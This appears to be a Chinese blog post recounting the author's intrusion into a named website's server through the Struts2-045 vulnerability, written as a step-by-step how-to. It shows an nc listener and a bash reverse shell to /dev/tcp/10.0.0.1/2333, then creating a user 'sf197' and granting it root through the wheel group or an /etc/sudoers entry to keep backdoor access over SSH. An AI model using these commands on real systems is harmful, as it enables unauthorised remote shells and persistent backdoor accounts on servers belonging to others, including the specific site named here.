前言、
提權這么久了 還是頭一次提下Linux的服務器。。。
由於之前一直鑽研的win服務器 要不是前些日子爆出來Struts2-045漏洞
估計還沒時間接觸Linux提權....
正文、
st2漏洞頁面
http://www.dainar.com/index.action
可以看到是root權限的
接着就是想辦法添加一個root組的用戶
由於添加用戶需要兩次重復輸入密碼(不像win服務器直接net user)
所以nc反彈一個shell到外網服務器上
nc -vv -l -p 2333
在st2工具里輸入
bash -i >& /dev/tcp/10.0.0.1/2333 0>&1
10.0.0.1是你的外網ip 2333是你監聽的端口
然后執行反彈 成功反彈上來后
添加用戶、
用adduser命令添加一個普通用戶,命令如下: #adduser sf197 //添加一個名為sf197的用戶 #passwd sf197 //修改密碼 Changing password for user sf197. New UNIX password: //在這里輸入新密碼 Retype new UNIX password: //再次輸入新密碼 passwd: all authentication tokens updated successfully.//建立成功。
添加用戶到root組、
方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注釋(#)去掉
## Allows people in group wheel to run all commands
%wheel ALL=(ALL) ALL
然后修改用戶,使其屬於root組(wheel),命令如下:
#usermod -g root sf197
修改完畢,現在可以用sf197帳號登錄,然后用命令 su - ,即可獲得root權限進行操作。
方法二:修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示:
## Allow root to run any commands anywhere
root ALL=(ALL) ALL
sf197 ALL=(ALL) ALL
修改完畢,現在可以用sf197帳號登錄,然后用命令 su - ,即可獲得root權限進行操作。
成功添加完畢
用ssh協議連接服務器 執行id返回root組!
轉載請注明本文作者:admin-神風